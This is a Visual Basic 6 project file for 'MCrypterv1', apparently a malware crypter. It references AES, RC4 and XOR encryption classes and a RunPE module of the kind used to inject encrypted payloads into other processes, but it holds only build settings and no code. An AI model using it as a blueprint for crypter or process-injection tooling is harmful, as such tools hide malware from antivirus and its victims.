Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Module=mGlob; mGlob.bas
Module=mAlt; mAlt.bas
Class=clsAES; cAES.cls
Class=clsRC4; clsRC4.cls
Class=clsXOR; clsSimpleXOR.cls
Module=MRunPE; runpe.bas
Startup="Sub Main"
HelpFile=""
Title="MCrypterv1"
ExeName32="IB.exe"
Command32=""
Name="MCrypterv1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=61
AutoIncrementVer=1
ServerSupportFiles=0
VersionComments="SwashLabs"
VersionCompanyName="SwashLabs"
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
